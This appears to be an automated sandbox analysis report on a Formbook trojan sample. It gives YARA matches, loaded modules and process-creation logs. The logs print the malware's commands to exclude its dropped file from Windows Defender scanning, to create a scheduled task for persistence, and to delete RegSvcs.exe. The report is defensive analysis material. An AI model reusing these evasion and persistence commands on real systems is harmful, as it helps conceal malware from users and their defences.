Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: RegSvcs.exe PID: 5224, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 3236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KfYvtUBOq.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, dy15U5y9QXx5oVXGvS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, dy15U5y9QXx5oVXGvS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, dy15U5y9QXx5oVXGvS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@296/11@13/3

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_00723C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

15_2_00723C66

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_0072205A CoCreateInstance,

15_2_0072205A

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Mutant created: \Sessions\1\BaseNamedObjects\FuBOvzWrVeorQDb
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File created: C:\Users\user\AppData\Local\Temp\tmp89CA.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: WLDP.DLL		15_2_00724136
Source: C:\Windows\SysWOW64\rundll32.exe	Command line argument: localserver		15_2_00724136

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Virustotal: Detection: 24%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe C:\Users\user\AppData\Roaming\KfYvtUBOq.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
